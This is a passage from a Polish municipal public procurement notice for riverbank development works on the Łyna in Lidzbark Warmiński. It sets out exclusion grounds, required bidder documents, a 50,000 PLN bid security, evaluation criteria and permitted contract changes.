kompleksowej realizacji zamówienia. Kompletne wynagrodzenie całego personelu oraz wszelkie koszty związane z obsługą muszą być zawarte w cenie oferty Wykonawcy.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału                            w postępowaniu, Zamawiający żąda następujących dokumentów:
1. zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że
wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3
miesiące przed upływem terminu składania ofert, lub innego dokumentu
potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem
podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub
grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub
rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji
właściwego organu;
2. zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń
Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu
potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia
społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem
terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarł
porozumienie z właściwym organem w sprawie spłat tych należności wraz                                             z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem
zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie                              w całości wykonania decyzji właściwego organu;
3. odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności
gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu
potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp;
4. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej
Polskiej, zamiast dokumentów, o których mowa w ust. 1,2 i 3, składa
dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1) nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub
zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
2) nie otwarto jego likwidacji ani nie ogłoszono upadłości.
5. Dokument, o którym mowa w ust. 4 pkt 2, powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu. Dokument, o którym mowa w ust. 4 pkt 1, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1. W celu potwierdzenia spełnienia przez Wykonawcę warunków udziału w postępowaniu dotyczących sytuacji ekonomicznej lub finansowej, Zamawiający żąda następujących dokumentów:       1.1. informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej
wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert;
1.2. Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć dokumentów dotyczących
sytuacji finansowej lub ekonomicznej wymaganych przez zamawiającego, może złożyć inny
dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez Zamawiającego warunku udziału w postępowaniu.
2. W celu potwierdzenia spełnienia przez Wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej, Zamawiający żąda następujących dokumentów:        
2.1. wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy                w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny                           o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty;
2.2. wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego,                  w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.

<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Zgodnie z art. 24 ust. 11 ustawy Pzp, Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy Pzp, przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu                     o udzielenie zamówienia. Wzór oświadczenia o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp stanowi Załącznik nr 6 do SIWZ. Oświadczenie należy przekazać Zamawiającemu w oryginale w formie pisemnej.
W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie                         o przynależności lub braku przynależności do tej samej grupy kapitałowej, składa każdy                      z Wykonawców.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1. Wykonawca przystępując do przetargu ma obowiązek wnieść wadium w wysokości:    
    50 000,00 złotych (słownie: pięćdziesiąt tysięcy złotych), na cały okres związania ofertą, 
    który wynosi 30 dni. Bieg terminu związania ofertą rozpoczyna się wraz z upływem terminu 
    składania ofert.
2. Wadium w wymaganej przez Zamawiającego wysokości należy wnieść przed upływem 
    terminu składania ofert. 
3. Wadium może być wniesione w następujących formach:
1)	w pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo  kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych, 
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2016 r., poz. 359).
4. Miejsce i sposób wniesienia wadium.
a)	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Urzędu  Miejskiego w Lidzbarku Warmińskim w Banku Millennium S.A. Nr  13116022020000000061931481, z dopiskiem: Wadium  Zagospodarowanie brzegów Łyny.
Oferta jest skutecznie zabezpieczona wadium, jeśli pieniądze znajdą się na ww. rachunku  przed terminem składania ofert. Kopię potwierdzenia wniesienia wadium poświadczoną za zgodność z oryginałem należy dołączyć do oferty.
 b) W przypadku wnoszenia wadium w pozostałych dopuszczalnych formach, kopię dokumentu 
     poświadczoną za zgodność z oryginałem należy dołączyć do oferty. 
     Ponadto do oferty należy dołączyć, w osobnej koszulce lub kopercie, oryginał tego 
     dokumentu. Nie bindować i nie zszywać z ofertą. 
5. W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczenia, 
    dokument powinien być sporządzony zgodnie z obowiązującym prawem i winien zawierać 
    następujące elementy:
a)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji lub poręczenia (Zamawiającego), gwaranta lub poręczyciela (instytucji udzielających gwarancji lub poręczenia) oraz wskazanie ich siedzib,
b)	określenie wierzytelności, która ma być zabezpieczona gwarancją lub poręczeniem,
c)	kwotę gwarancji lub poręczenia,
d)	termin ważności gwarancji lub poręczenia,
e)	zobowiązanie gwaranta lub poręczyciela do zapłacenia kwoty gwarancji lub poręczenia na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie,                               iż Wykonawca, którego ofertę wybrano:
	odmówił podpisania umowy na warunkach określonych w ofercie, lub
	nie wniósł zabezpieczenia należytego wykonania umowy, lub
	zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, 
f)	zobowiązanie gwaranta lub poręczyciela do zapłacenia kwoty gwarancji lub poręczenia jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a,                   z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1, oświadczenia,                     o którym mowa w art. 25a ust. 1, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co spowodowało brak 
              możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej,
g)	gwarancja lub poręczenie winno być nieodwołalne i bezwarunkowe. Gwarancja lub poręczenie winny przewidywać termin bezwarunkowej wypłaty maksymalnie do 21 dni od pierwszego pisemnego żądania wypłaty wadium,
h)	wszelkie spory dotyczące gwarancji lub poręczenia podlegają rozstrzygnięciu zgodnie  z prawem Rzeczypospolitej Polskiej i podlegają kompetencji sądu właściwego dla siedziby Zamawiającego,
i)	jednocześnie Zamawiający wymaga, aby okres ważności gwarancji lub poręczenia nie był krótszy niż okres związania ofertą,
j)	w przypadku wniesienia wadium przez Wykonawców wspólnie ubiegających się            o udzielenie niniejszego zamówienia Zamawiający uzna wadium za wniesione skutecznie, o ile odpowiadać będzie postanowieniom niniejszej specyfikacji istotnych warunków zamówienia oraz wniesione zostało przez jednego z wykonawców wspólnie ubiegających się o udzielenie zamówienia w wymaganej wysokości i wymaganym terminie.
6. Oferta Wykonawcy, który nie wniesie wadium na zasadach określonych w Specyfikacji   
   Istotnych Warunków Zamówienia, zgodnie z art. 89 ust. 1 pkt 7b) ustawy Pzp,  zostanie 
    odrzucona.
7. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta 
    została wybrana: 
-	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
- 	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
-	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy. 
8. Zamawiający zatrzymuje również wadium wraz z odsetkami w przypadku określonym
    w art. 46 ust. 4a ustawy Pzp.
9. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty    
    najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego 
    oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Pzp. 
10.Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca 
     wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz 
     wniesieniu zabezpieczenia należytego wykonania umowy.
11.Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę 
    przed upływem terminu składania ofert.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>okres gwarancji jakości i rękojmi za wady </td><td>30</td></tr><tr><td>aspekty społeczne (zatrudnienie osób bezrobotnych) </td><td>10</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której 
    dokonano wyboru Wykonawcy, mogą być dokonane w następującym zakresie:
1) Zaistnienie okoliczności uniemożliwiających realizację przedmiotu umowy w terminie 
    przewidzianym na zakończenie robót, a w szczególności:
a)	 wystąpienie siły wyższej, za którą uważa się zdarzenia o charakterze nadzwyczajnym, 
      występujące po zawarciu umowy, a których Strony nie były w stanie przewidzieć                      
      w momencie jej zawierania i których zaistnienie lub skutki uniemożliwiają wykonanie 
      przedmiotu umowy w terminie, 
b)	 wystąpienie warunków atmosferycznych odbiegających od typowych,uniemożliwiających 
       prowadzenie robót budowlanych, przeprowadzenie prób i sprawdzeń, dokonywanie 
       odbiorów, (np. intensywne opady śniegu, deszczu, temperatury poniżej -5oC),
c)	 wystąpienie sytuacji kryzysowej, o której mowa w art. 2 pkt 8b) ustawy Pzp,
d)	 wystąpienie nieprzewidzianych w SIWZ warunków geologicznych, archeologicznych lub 
        terenowych, w szczególności: niewypały, niewybuchy, wykopaliska archeologiczne, itp.,
e)	 zmiana zakresu robót budowlanych, wystąpienie robót zamiennych lub dodatkowych 
       od wykonania których uzależnione jest wykonanie zamówienia podstawowego,
   f) wystąpienie przestojów robót budowlanych spowodowanych wstrzymaniem wykonania 
      robót budowlanych przez uprawnione organy, z przyczyn nie wynikających z winy 
      stron umowy,
   g) niemożność wykonywania robót, gdy obowiązujące przepisy nie dopuszczają do   
       wykonywania robót lub nakazują wstrzymanie robót z przyczyn niezawinionych przez 
       Wykonawcę,
   h) wystąpienie opóźnień w dokonaniu określonych czynności lub ich zaniechania przez 
       właściwe organy lub Zamawiającego, które nie są następstwem okoliczności, za które 
       Wykonawca ponosi odpowiedzialność,  
   i) wystąpienie przestojów spowodowanych koniecznością usuwania nieumyślnych 
      uszkodzeń istniejących urządzeń nieoznaczonych w dokumentacji projektowej,
   j) wystąpienia wad w dokumentacji projektowej skutkującej koniecznością dokonania 
      poprawek lub uzupełnień, jeżeli uniemożliwia to lub wstrzymuje realizację określonego   
      rodzaju robót mających wpływ na termin wykonania przedmiotu umowy, przy  
      zastrzeżeniu braku zmiany wynagrodzenia ryczałtowego, określonego w § 5 ust. 2 
      umowy.
2) Zmiana sposobu spełnienia świadczenia na skutek wystąpienia zmian technologicznych 
    spowodowanych, w szczególności następującymi okolicznościami:
   a) niedostępność na rynku materiałów lub produktów wskazanych w dokumentacji 
       projektowej lub specyfikacji technicznej wykonania i odbioru robót budowlanych 
       spowodowana zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub 
       produktów,
   b) pojawienie się na rynku materiałów lub produktów nowszej generacji pozwalających na 
       zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji 
       wykonanego przedmiotu umowy,
   c) konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań 
      technicznych/technologicznych niż wskazane w dokumentacji projektowej lub 
      w specyfikacji technicznej wykonania i odbioru robót budowlanych, w sytuacji gdyby 
      zastosowanie przewidzianych rozwiązań groziłoby niewykonaniem lub wadliwym 
      wykonaniem przedmiotu umowy.
2. W przypadku zaistnienia okoliczności, o których mowa w ust. 1 pkt 1 termin realizacji 
przedmiotu umowy może ulec wydłużeniu o okres trwania tych okoliczności lub o czas  
niezbędny do należytego wykonania przedmiotu umowy.
3. Zmiana umowy może również nastąpić w przypadku:
	1)	zmiany przepisów prawa mających wpływ na treść umowy,
	2)	zaistnienia konieczności wykonania robót zamiennych potwierdzonych przez osoby  
  	      uprawnione, cena ryczałtowa może ulec zmianie o różnicę wartości robót 
          (materiałów) zamiennych ustalonych kosztorysem powykonawczym zatwierdzonym 
          przez Zamawiającego, a wartością ryczałtową tego zakresu robót, zamiast którego 
          będą wykonywane roboty (stosowane materiały) zamienne, 
	3)   ograniczenia zakresu robót lub wprowadzenia robót zamiennych o niższej wartości    
	      niż przewidywana w SIWZ i w ofercie, wysokość wynagrodzenia Wykonawcy 
           zostanie zmniejszona, 
	4)	niewykonania części lub całości zamówienia z powodu tego, że wykonanie 
           zamówienia nie leży w interesie publicznym, czego nie można było przewidzieć                     
           w chwili zawarcia umowy, lub dalsze wykonywanie umowy może zagrozić istotnemu 
           interesowi bezpieczeństwa państwa lub bezpieczeństwu publicznemu, tym przypadku,  
           wysokość wynagrodzenia Wykonawcy zostanie zmniejszona o wartość robót 
           niewykonanych,
    5)    zmiany kierownika budowy lub  kierowników robót lub inspektorów nadzoru 
           inwestorskiego, 
    6)	zmiany osób reprezentujących strony,
    7)	wystąpienia:
          a) rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można 
              usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności                                
              i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez Strony;    
          b) uzasadnionej przyczynami technicznymi konieczności zmiany sposobu wykonania
              umowy; 
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 20/01/2017, godzina: 12:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Oferty muszą być sporządzone w języku polskim.<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />1. Kompletna oferta musi zawierać:
1) Wypełniony i podpisany Formularz Oferty, sporządzony według wzoru stanowiącego 
    załącznik nr 1 do SIWZ,
2) Wypełnione i podpisane oświadczenia, sporządzone według wzorów stanowiących 
    złącznik nr 2 i nr 3 do SIWZ,  
     3) Wypełniony i podpisany Harmonogram rzeczowo-finansowy, sporządzony 
         zgodnie z wzorem stanowiącym załącznik nr 7 do SIWZ,
          4) Stosowne Pełnomocnictwo(a) - w przypadku, gdy  wykonawcę reprezentuje 
              pełnomocnik,
    W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia  
    dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu 
    o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia 
 umowy w sprawie niniejszego zamówienia publicznego,
5) Kopię dowodu wniesienia wadium,
6) Zobowiązanie podmiotu trzeciego albo inny dokument służący Wykonawcy wykazaniu
    potencjału podmiotu trzeciego, w zakresie określonym w art. 22a ust. 1 ustawy Pzp  
    w przypadku, gdy Wykonawca przy wykazaniu spełnienia warunków udziału                          
    w postępowaniu polega na zdolnościach lub sytuacji innych podmiotów. 
2. W przypadku złożenia przez Wykonawców dokumentów zawierających kwoty wyrażone                       w innych walutach niż PLN, dla potrzeb oceny spełnienia warunków udziału w postępowaniu, 
